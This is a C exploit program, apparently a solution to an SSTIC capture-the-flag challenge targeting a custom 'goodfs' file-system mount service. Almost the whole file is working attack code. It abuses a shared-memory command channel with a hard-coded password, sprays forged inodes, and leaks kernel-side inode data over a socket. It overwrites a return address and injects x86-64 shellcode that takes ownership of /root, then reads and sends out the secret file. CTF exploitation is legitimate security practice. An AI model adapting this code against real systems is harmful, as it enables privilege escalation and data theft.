#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/types.h>
#include <utime.h>
#include <time.h>
#include <stdint.h>
#include <sys/socket.h>
#include "generated.h"

#define PASSWORD "MGhtT34gHj5yFcszRYB4gf45DtymEi"
// #define PASSWORD "goodfspassword"


typedef char* (*pFn_strcpy)(char* dst,char* src);
typedef void* (*pFn_memcpy)(void* dst,void* src,size_t size);
typedef void* (*pFn_memset)(void *s, int c, size_t n);
typedef int (*pFn_write)(int fd,const void* buffer,size_t size);
typedef int (*pFn_read)(int fd,void* buffer,size_t size);
typedef int (*pFn_open)(const char *pathname, int flags, int mode);
typedef int (*pFn_close)(int fd);
typedef int (*pFn_mkdir)(const char* pathname,int mode);
typedef void* (*pFn_mmap)(void *addr, size_t length, int prot, int flags,int fd, off_t offset);
typedef int (*pFn_munmap)(void *addr, size_t length);
typedef time_t (*pFn_time)(time_t *tloc);
typedef int (*pFn_utime)(const char *filename, const struct utimbuf *times);
typedef int (*pFn_getdents64)(int fd,void* dirp,size_t count);
typedef char* (*pFn_strcat)(char* dest,const char* src);
typedef int (*pFn_stat)(int unused,const char* path,struct stat* buf);
typedef unsigned long long (*pFn_seek)(int fd,unsigned long long offset,int whence);
typedef int (*pFn_socket)(int domain, int type, int protocol);
typedef int (*pFn_sprintf)(char *str, const char *format, ...);

#define FD_SOCKET 5


#define MODE_DIR 0x8000
#define MODE_FIL 0x4000

#pragma pack(push)
#pragma pack(1)

typedef struct _goodfs_inode {
	uint32_t uid;
	uint32_t gid;
	uint64_t atime;
	uint64_t mtime;
	uint16_t data_block;
	uint16_t mode;
	uint32_t size;
}goodfs_inode;

typedef struct _goodfs_dir_entry {
	uint32_t ino;
	uint8_t name[32];
}goodfs_dir_entry;

typedef struct _goodfs_cmd{
	uint32_t ctrl;
	unsigned char password[256];
	unsigned char command[256];
	unsigned char arguments[256];
}goodfs_cmd;

#pragma pack(pop)

int mymain();

void mount_goodfs(volatile goodfs_cmd* cmd);
void umount_goodfs(volatile goodfs_cmd* cmd);
void spray_goodfs(volatile goodfs_cmd* cmd);
void spray_bad_cmd(volatile goodfs_cmd* cmd);
void umount_goodfs_shellcode(volatile goodfs_cmd* cmd);
void leak_page();


int mymain()
{
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	pFn_strcat my_strcat = (pFn_strcat)LIBC_STRCAT;
	pFn_memcpy my_memcpy = (pFn_memcpy)LIBC_MEMCPY;
	
	pFn_write my_write = (pFn_write)LIBC_WRITE;
	pFn_read my_read = (pFn_read)LIBC_READ;
	pFn_open my_open = (pFn_open)LIBC_OPEN;
	pFn_close my_close = (pFn_close)LIBC_CLOSE;
	pFn_mkdir my_mkdir = (pFn_mkdir)LIBC_MKDIR;
	pFn_mmap my_mmap = (pFn_mmap)LIBC_MMAP;
	pFn_munmap my_munmap = (pFn_munmap)LIBC_MUNMAP;
	pFn_time my_time = (pFn_time)LIBC_TIME;
	pFn_utime my_utime = (pFn_utime)LIBC_UTIME;
	pFn_getdents64 my_getdents64 = (pFn_getdents64)LIBC_GETDENTS64;
	pFn_stat my_stat = (pFn_stat)LIBC_STAT;
	pFn_seek my_lseek = (pFn_seek)LIBC_SEEK;
	pFn_socket my_socket = (pFn_socket)LIBC_SOCKET;
	pFn_sprintf my_sprintf = (pFn_sprintf)LIBC_SPRINTF;
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	
	char path[256] = {0};
	int fd_shm = my_open("/run/mount_shm",2,0x1B6);
	volatile goodfs_cmd* memptr = my_mmap(0,0x1000,3,1,fd_shm,0);
	
	mount_goodfs(memptr);
	
	// 30 inodes
	for(int i = 0; i < 29; i++)
	{
		my_sprintf(path,"/mnt/goodfs/public/%d",i);
		int fd = my_open(path,O_CREAT|O_RDWR,0);
		my_close(fd);
	}
	
	my_mkdir("/mnt/goodfs/public/30",0777);
	
	// 30 inodes
	for(int i = 0; i < 29; i++)
	{
		my_sprintf(path,"/mnt/goodfs/public/30/%d",i);
		
		int fd = my_open(path,O_CREAT|O_RDWR,0);
		my_close(fd);
	}
	
	my_mkdir("/mnt/goodfs/public/30/30",0777);
	
	// 30 inodes
	for(int i = 0; i < 29; i++)
	{
		my_sprintf(path,"/mnt/goodfs/public/30/30/%d",i);
		int fd = my_open(path,O_CREAT|O_RDWR,0);
		my_close(fd);
	}
	
	my_mkdir("/mnt/goodfs/public/30/30/30",0777);
	
	// 30 inodes
	for(int i = 0; i < 29; i++)
	{
		int fd = my_open(path,O_CREAT|O_RDWR,0);
		my_sprintf(path,"/mnt/goodfs/public/30/30/30/%d",i);
		my_close(fd);
	}
	
	my_mkdir("/mnt/goodfs/public/30/30/30/30",0777);

	
	int fd_todo = my_open("/mnt/goodfs/public/todo.txt",O_RDWR,0);
	if(fd_todo < 0)
		my_write(FD_SOCKET,"failed open todo.txt\n",20);
	
	goodfs_inode inode[4] = {0};
	
	for(int i = 0; i < 4; i++)
	{
		inode[i].uid = 1000;
		inode[i].gid = 1000;
		my_time(&inode[i].atime);
		my_time(&inode[i].mtime);
		inode[i].data_block = 5;
		inode[i].mode = 0x41E4;
		inode[i].size = 0;
	}
	
	my_write(fd_todo,&inode,sizeof(goodfs_inode) * 4);
	my_close(fd_todo);
	
	
	// mark directory in future
	my_mkdir("/mnt/goodfs/public/30/30/30/30/special",0777);
	struct utimbuf timbuf = {0};
	my_time(&timbuf.actime);
	my_time(&timbuf.modtime);
	
	timbuf.actime += 60*30;
	timbuf.modtime += 60*30;
	
	my_utime("/mnt/goodfs/public/30/30/30/30/special",&timbuf);
	
	umount_goodfs(memptr); // flush page to disk
	
	mount_goodfs(memptr);
	
	int fd_spec[8] = {0};
	for(int i = 0; i < 8; i++)
	{
		my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/spec%d",i);
		fd_spec[i] = my_open(path,O_CREAT|O_RDWR,0777);
		if(fd_spec[i] < 0)
			my_write(FD_SOCKET,"[-] FAILED 1",12);
		
		if(my_write(fd_spec[i],"AAAA",4) != 4)
			my_write(FD_SOCKET,"[-] FAILED 2",12);
		
		my_close(fd_spec[i]);
		fd_spec[i] = -1;
	}

	umount_goodfs(memptr);
	
	mount_goodfs(memptr);
	
	for(int chk_id = 0; chk_id < 8; chk_id++)
	{
		my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/spec%d",chk_id);
		fd_spec[chk_id] = my_open(path,O_RDWR,0);
		if(fd_spec[chk_id] < 0)
			my_write(FD_SOCKET,"[-] FAILED 3",12);
		
		my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/chk%d",chk_id);
		my_mkdir(path,0777);
		
		goodfs_dir_entry dentry[16] = {0};
		for(int i = 0; i < 16; i++)
		{
			dentry[i].ino = -3 -128 + i + (chk_id * 16);
			my_sprintf(dentry[i].name,"D%d",i);
		}
		
		my_write(fd_spec[chk_id],dentry,sizeof(goodfs_dir_entry) * 16);
		my_close(fd_spec[chk_id]);
	}
	
	umount_goodfs(memptr);
	
	for(int i = 0; i < 30; i++)
		spray_goodfs(memptr);
	
	mount_goodfs(memptr);
	
	spray_bad_cmd(memptr);
	
	leak_page();
	
	timbuf.actime = 0x3031323334353637;
	timbuf.modtime = 0x9090909090900eeb; // shellcode	
	my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/chk%d/D%d",3,8);
	
	if(my_utime(path,&timbuf))
		my_write(FD_SOCKET,"[-] FAILED 5",12);
	
	my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/chk%d/D%d",3,0);
	
	timbuf.modtime = 0x00909090909006eb; // jmp
	if(my_utime(path,&timbuf))
		my_write(FD_SOCKET,"[-] FAILED 5",12);
	
	umount_goodfs_shellcode(memptr);
	
	struct stat statbuf = {0};
	int count = 0;
	while(statbuf.st_uid == 0)
		my_stat(1,"/root",&statbuf);
	
	int fd_flag = my_open("/root/final_secret.txt",O_RDONLY,0);
	
	volatile int x = 0;
	while(my_read(fd_flag,path,256) > 0)
	{
		int res = my_write(FD_SOCKET,path,256);
		/* sleeping without sleep */
		for(int i = 0; i < 100000; i++)
		{
			x+=res;
		}
	}
	
	my_close(FD_SOCKET);
	
	my_munmap((void*)memptr,0x1000);
	
	my_close(fd_shm);
	
	return x;
}

void mount_goodfs(volatile goodfs_cmd* cmd)
{
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	
	my_memset((void*)cmd->password,'A',256);
	my_memset((void*)cmd->command,'A',256);
	my_memset((void*)cmd->arguments,'A',256);
	
	my_strcpy((char*)cmd->command,"mount");
	my_strcpy((char*)cmd->arguments,"goodfs");
	my_strcpy((char*)cmd->password,PASSWORD);
	cmd->ctrl = 1;
	while(cmd->ctrl != 2){}
}

void umount_goodfs(volatile goodfs_cmd* cmd)
{
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	
	my_memset((void*)cmd->password,'A',256);
	my_memset((void*)cmd->command,'A',256);
	my_memset((void*)cmd->arguments,'A',256);
	
	my_strcpy((char*)cmd->command,"umount");
	my_strcpy((char*)cmd->arguments,"goodfs");
	my_strcpy((char*)cmd->password,PASSWORD);
	cmd->ctrl = 1;
	while(cmd->ctrl != 2){}
}

void spray_goodfs(volatile goodfs_cmd* cmd)
{
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	
	my_memset((void*)cmd->password,'A',256);
	my_memset((void*)cmd->command,'B',256);
	my_memset((void*)cmd->arguments,'C',256);
	
	my_strcpy((char*)cmd->command,"mount");
	my_strcpy((char*)cmd->arguments,"goodfs");
	cmd->ctrl = 1;
	while(cmd->ctrl != 3){}
}

void my_memcpy(unsigned char* dst,unsigned char* src,int size)
{
	for(int i =0; i < size; i++)
		dst[i] = src[i];
}

void umount_goodfs_shellcode(volatile goodfs_cmd* cmd)
{
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	
	my_memset((void*)cmd->password,'\xFF',256);
	my_memset((void*)cmd->command,'\xFF',256);
	my_memset((void*)cmd->arguments,'C',256);
	
	unsigned long long rip = 0x00000000004016ed;
	my_memset((unsigned char*)&cmd->arguments[8],'X',176 + 8);
	my_memcpy((unsigned char*)&cmd->arguments[8 + 176 + 8],(unsigned char*)&rip,8);
	
	// chown sstic:sstic /root
	// chown sstic:sstic /root/final_secret.txt
	// generated using shellcode/final-shellcode-generator.py
	unsigned char shellcode[88] = {0xeb,0x3b,0x5f,0x57,0x48,0x31,0xc0,0x88,0x47,0x16,0x48,0x31,0xf6,0x48,0x31,0xd2,0x66,0xbe,0xe8,0x03,0x66,0xba,0xe8,0x03,0x48,0x31,0xc0,0xb0,0x5c,0x0f,0x05,0x5f,0x48,0x31,0xc0,0x88,0x47,0x05,0x48,0x31,0xf6,0x48,0x31,0xd2,0x66,0xbe,0xe8,0x03,0x66,0xba,0xe8,0x03,0x48,0x31,0xc0,0xb0,0x5c,0x0f,0x05,0xeb,0xfe,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x72,0x6f,0x6f,0x74,0x2f,0x66,0x69,0x6e,0x61,0x6c,0x5f,0x73,0x65,0x63,0x72,0x65,0x74,0x2e,0x74,0x78,0x74};
	
	my_memcpy((unsigned char*)&cmd->arguments[8 + 0x10],shellcode,sizeof(shellcode));
	
	my_strcpy((char*)cmd->command,"umount");
	my_strcpy((char*)cmd->arguments,"goodfs");
	my_strcpy((char*)cmd->password,PASSWORD);
	cmd->ctrl = 1;
	// command doesn't end
	// while(cmd->ctrl != 1){}
}

void spray_bad_cmd(volatile goodfs_cmd* cmd)
{
	pFn_memset my_memset = (pFn_memset)LIBC_MEMSET;
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	
	my_memset((void*)cmd->password,'\xFF',256);
	my_memset((void*)cmd->command,'\xFF',256);
	my_memset((void*)cmd->arguments,'\xFF',256);
	
	// forge valid inode 0
	*((int*)&cmd->password[256 - 0x10 + 0]) = 1000;
	*((int*)&cmd->password[256 - 0x10 + 4]) = 1000;
	
	*((short*)&cmd->command[8 + 2]) = 0x41FF;
	*((short*)&cmd->command[8]) = 0x5858;
	
	// forge valid inode 1
	*((int*)&cmd->command[256 - 0x10 + 0]) = 1000;
	*((int*)&cmd->command[256 - 0x10 + 4]) = 1000;
	
	*((short*)&cmd->arguments[8 + 2]) = 0x41FF;
	*((short*)&cmd->arguments[8]) = 0x5858;
	
	my_strcpy((char*)cmd->command,"umount");
	my_strcpy((char*)cmd->arguments,"xxxxxx");
	my_strcpy((char*)cmd->password,PASSWORD);
	cmd->ctrl = 1;
	while(cmd->ctrl != 1){}
}

void leak_page()
{
	pFn_strcpy my_strcpy = (pFn_strcpy)LIBC_STRCPY;
	pFn_strcat my_strcat = (pFn_strcat)LIBC_STRCAT;
	pFn_write my_write = (pFn_write)LIBC_WRITE;
	pFn_stat my_stat = (pFn_stat)LIBC_STAT;
	pFn_sprintf my_sprintf = (pFn_sprintf)LIBC_SPRINTF;
	
	char path[128] = {0};
	
	for(int chk_id = 0; chk_id < 8; chk_id++)
	{
		for(int d = 0; d < 16; d++)
		{
			struct stat statbuf = {0};
			
			my_sprintf(path,"/mnt/goodfs/public/30/30/30/30/special/chk%d/D%d",chk_id,d);
			
			if(my_stat(1,path,&statbuf))
				my_write(FD_SOCKET,"[-] FAILED 4",12);
			
			goodfs_inode leak = {0};
			leak.uid = statbuf.st_uid;
			leak.gid = statbuf.st_gid;
			leak.atime = statbuf.st_atime;
			leak.mtime = statbuf.st_mtime;
			leak.data_block = 0;
			leak.mode = statbuf.st_mode;
			leak.size = statbuf.st_size;
			my_write(FD_SOCKET,&leak,sizeof(goodfs_inode));
		}
	}
}

